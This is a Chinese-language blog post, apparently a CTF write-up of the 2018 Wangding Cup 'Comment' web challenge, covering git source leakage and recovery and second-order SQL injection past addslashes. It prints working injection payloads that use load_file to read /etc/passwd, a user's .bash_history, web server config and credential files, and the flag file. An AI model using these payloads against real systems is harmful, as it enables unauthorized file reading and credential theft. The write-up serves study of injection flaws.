

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Yu ting">
  <meta name="keywords" content="">
  <title>网鼎杯 2018||Comment - liquor&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"liquor-boop.github.io","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="liquor's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="网鼎杯 2018||Comment">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-07-17 15:20" pubdate>
        July 17, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      17
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">网鼎杯 2018||Comment</h1>
            
            <div class="markdown-body">
              <p>涉及知识点</p>
<ul>
<li>二次注入</li>
<li>git泄露</li>
<li>git恢复</li>
</ul>
<p>进入页面是一个留言板（盲猜二次注入），需要登录，密码后三位未知，bp爆破</p>
<p><img src="/2021/07/17/lod/1.jpg" srcset="/img/loading.gif" alt="1"></p>
<p>没找到注入点，后台扫描，git泄露</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-keyword">include</span> <span class="hljs-string">&quot;mysql.php&quot;</span>;
session_start();
<span class="hljs-keyword">if</span>($_SESSION[<span class="hljs-string">&#x27;login&#x27;</span>] != <span class="hljs-string">&#x27;yes&#x27;</span>)&#123;
    header(<span class="hljs-string">&quot;Location: ./login.php&quot;</span>);
    <span class="hljs-keyword">die</span>();
&#125;
<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">&#x27;do&#x27;</span>]))&#123;
<span class="hljs-keyword">switch</span> ($_GET[<span class="hljs-string">&#x27;do&#x27;</span>])
&#123;
<span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;write&#x27;</span>:
    <span class="hljs-keyword">break</span>;
<span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;comment&#x27;</span>:
    <span class="hljs-keyword">break</span>;
<span class="hljs-keyword">default</span>:
    header(<span class="hljs-string">&quot;Location: ./index.php&quot;</span>);
&#125;
&#125;
<span class="hljs-keyword">else</span>&#123;
    header(<span class="hljs-string">&quot;Location: ./index.php&quot;</span>);
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>
<p>源码不全</p>
<blockquote>
<p>git log --all  or  git log --reflog//查看文件更改日志</p>
<pre><code class="hljs angelscript">&gt;commit e5b2a2443c2b6d395d06960123142bc91123148c (<span class="hljs-built_in">ref</span>s/stash)
&gt;Merge: bfbdf21 <span class="hljs-number">5556e3</span>a
&gt;Author: root &lt;<span class="hljs-symbol">root@</span>localhost.localdomain&gt;
&gt;Date:   Sat Aug <span class="hljs-number">11</span> <span class="hljs-number">22</span>:<span class="hljs-number">51</span>:<span class="hljs-number">17</span> <span class="hljs-number">2018</span> +<span class="hljs-number">0800</span>

   WIP on master: bfbdf21 add write_do.php

&gt;commit <span class="hljs-number">5556e3</span>ad3f21a0cf5938e26985a04ce3aa73faaf
&gt;Author: root &lt;<span class="hljs-symbol">root@</span>localhost.localdomain&gt;
&gt;Date:   Sat Aug <span class="hljs-number">11</span> <span class="hljs-number">22</span>:<span class="hljs-number">51</span>:<span class="hljs-number">17</span> <span class="hljs-number">2018</span> +<span class="hljs-number">0800</span>

   index on master: bfbdf21 add write_do.php

&gt;commit bfbdf218902476c5c6164beedd8d2fcf593ea23b (HEAD -&gt; master)
&gt;Author: root &lt;<span class="hljs-symbol">root@</span>localhost.localdomain&gt;
&gt;Date:   Sat Aug <span class="hljs-number">11</span> <span class="hljs-number">22</span>:<span class="hljs-number">47</span>:<span class="hljs-number">29</span> <span class="hljs-number">2018</span> +<span class="hljs-number">0800</span>

   add write_do.php</code></pre>
<p>git reset --hard xxx//xxx即为日志记录中最后更改时记录名称本题即为<code>e5b2a2443c2b6d395d06960123142bc91123148c</code></p>
</blockquote>
<p>完整代码：</p>
<p><img src="/2021/07/17/lod/1.png" srcset="/img/loading.gif" alt="1"></p>
<p>解题点：addslashes过滤后产生的<code>\</code>不会进入数据库，<code>'1过滤后变成\'1</code>，进入库中却仍为<code>'1</code>，取出数据后进行二次拼接，即可造成注入。</p>
<p>获取权限：</p>
<blockquote>
<p>在发帖处构造category为</p>
<pre><code class="hljs fix"><span class="hljs-attr">&gt;&#x27;, content</span>=<span class="hljs-string">user(),/*</span></code></pre>
<p>在留言处输入的content为</p>
<pre><code class="hljs arcade">&gt;*<span class="hljs-regexp">/#     /</span><span class="hljs-regexp">/闭合payload 中带有的 /</span>*</code></pre>
<p>得到</p>
<pre><code class="hljs vim">&gt;$sql = <span class="hljs-comment">&quot;insert into comment</span>
 <span class="hljs-keyword">set</span> category = <span class="hljs-string">&#x27;&#x27;</span>, content=user(),/*  
     content = <span class="hljs-string">&#x27;*/#&#x27;</span>,
     bo_id = <span class="hljs-string">&#x27;$bo_id&#x27;</span><span class="hljs-comment">&quot;;</span></code></pre>
<p>注：虽然category 是经过 addslashes 转义后写入数据库的，但是取出时是没有被转义的，即没有反斜杠的因为<code>放到数据库后会把转义符 \ 去掉（进入数据库后是没有反斜杠的）</code>，但是在cmment中，对于category的值从数据库取出来没有进行转义，直接拼接到sql insert语句中，这就存在二次注入的可能.</p>
<blockquote>
<img src="/2021/07/17/lod/2.jpg" srcset="/img/loading.gif" alt="2" style="zoom:50%;">
</blockquote>
</blockquote>
<p>读取/etc/passwd</p>
<blockquote>
<p>一般 <strong>flag</strong> 不会在数据库里面(因为如果在数据库中，不需要root权限)，现在要用 <strong>SQL语句</strong> 读取flag文件</p>
<blockquote>
<p>格式</p>
<p><code>select load_file(‘文件绝对路径’)</code></p>
<p>常见用法</p>
<blockquote>
<ul>
<li>读/etc/init.d下的东西，这里有配置文件路径<br>
<code>?id=1' union select 1,2,load_file('/etc/init.d/httpd')</code></li>
<li>得到web安装路径<br>
<code>?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')</code></li>
<li>读取密码文件<br>
<code>?id=1' union select 1,2,load_file('var/www/html/xxx.com/php/conn.inc.php')</code></li>
</ul>
</blockquote>
</blockquote>
</blockquote>
<p>payload</p>
<pre><code class="hljs sql">1&#x27;,content=(<span class="hljs-keyword">select</span> (<span class="hljs-keyword">load_file</span>(<span class="hljs-string">&#x27;/etc/passwd&#x27;</span>))),<span class="hljs-comment">/*</span></code></pre>
<img src="/2021/07/17/lod/3.jpg" srcset="/img/loading.gif" alt="3" style="zoom:67%;">
<p>/etc/passwd中一行记录对应着一个用户，每行记录又被冒号(:)分隔为7个字段，其格式和具体含义如下：</p>
<p><code>用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell</code></p>
<p><strong>tips</strong></p>
<blockquote>
<p>伪用户含义:</p>
<p>bin        拥有可执行的用户命令文件</p>
<p>sys        拥有系统文件</p>
<p>adm       拥有帐户文件</p>
<p>uucp      UUCP使用</p>
<p>lplp或lpd   子系统使用</p>
<p>nobody    NFS使用</p>
<p>如下：</p>
<img src="/2021/07/17/lod/4.jpg" srcset="/img/loading.gif" alt="4" style="zoom:50%;">
<table>
<thead>
<tr>
<th>字段</th>
<th>含义</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>用户名</td>
</tr>
<tr>
<td>2</td>
<td>用户的密码原来直接存储在第二字段，但是为了安全，最后专门有了/etc/shadow文件，现在默认用x替代</td>
</tr>
<tr>
<td>3</td>
<td>用户的uid,一般情况下root为0，1-499默认为系统账号，有的更大些到1000，500-65535为用户的可登录账号，有的系统从1000开始。</td>
</tr>
<tr>
<td>4</td>
<td>用户的gid,linux的用户都会有两个ID,一个是用户uid，一个是用户组id，在我们登录的时候，输入用户名和密码，其实会先到/etc/passwd查看是否有你输入的账号或者用户名，有的话将该账号与对应的UID和GID(在/etc/group中)读出来。然后读出主文件夹与shell的设置，然后再去检验密码是否正确，正确的话正常登录。</td>
</tr>
<tr>
<td>5</td>
<td>用户的账号说明解释</td>
</tr>
<tr>
<td>6</td>
<td>用户的家目录文件夹</td>
</tr>
<tr>
<td>7</td>
<td>用户使用的shell，如果换成/sbin/nologin/就是默认没有登录环境的。</td>
</tr>
</tbody>
</table>
</blockquote>
<p>www用户(一般和网站操作相关的用户，由中间件创建）的目录是/home/www可以查看 <code>.bash_history</code> 记录（每个在系统中拥有账号的用户在他的目录下都有一个“.bash_history”文件，保存了当前用户使用过的历史命令，方便查找。）</p>
<p>payload</p>
<pre><code class="hljs awk">a<span class="hljs-string">&#x27;,content=(select (load_file(&#x27;</span><span class="hljs-regexp">/home/</span>www<span class="hljs-regexp">/.bash_history&#x27;))),/</span>*</code></pre>
<p><img src="/2021/07/17/lod/5.jpg" srcset="/img/loading.gif" alt="5"></p>
<p>先进入/tmp/目录，然后解压html.zip，又把这个.zip文件删除了。然后又把解压得到的html这个文件夹复制到了/var/www/下面，然后又进入/var/www/html，将.DS_Store(.DS_Store(英文全称 Desktop Services Store)是一种由苹果公司的Mac OS X操作系统所创造的隐藏文件，<em>目的在于存贮目录的自定义属性</em>，例如文件们的图标位置或者是背景色的选择。<em>通过.DS_Store可以知道这个目录里面所有文件的清单</em>。)给删除，然后开启apache2服务。</p>
<p><em>/var/www/html下的.DS_Store被删，而/tmp/html下的.DS_Store没有被删除</em></p>
<p><code>.DS_Store</code> 文件中，经常会有一些不可键字符，所以我们可以使用hex函数对其内容进行转换，</p>
<p>payload</p>
<pre><code class="hljs awk"><span class="hljs-string">&#x27;, content=(select hex(load_file(&#x27;</span><span class="hljs-regexp">/tmp/</span>html<span class="hljs-regexp">/.DS_Store&#x27;))),/</span>*</code></pre>
<p>解码</p>
<p><img src="/2021/07/17/lod/6.jpg" srcset="/img/loading.gif" alt="6"></p>
<p>flag在flag_8946e1ff1ee3e40f.php里（不能在/tmp目录下，要回到/var/www/html ）</p>
<p>payload</p>
<pre><code class="hljs 最后一个坑，查看源码获得flag">a&#39;,content&#x3D;(select hex(load_file(&#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;flag_8946e1ff1ee3e40f.php&#39;))),&#x2F;*</code></pre>
<p>解码</p>
<img src="/2021/07/17/lod/7.jpg" srcset="/img/loading.gif" alt="7" style="zoom: 67%;">
<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://mochazz.github.io/2018/09/01/2018%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E5%9B%9B%E5%9C%BA/#comment">2018网鼎杯第四场Web题解</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/07/19/11/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">JSON Web Token</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/07/15/filter2/">
                        <span class="hidden-mobile">CISCN2021 Quals-filter</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
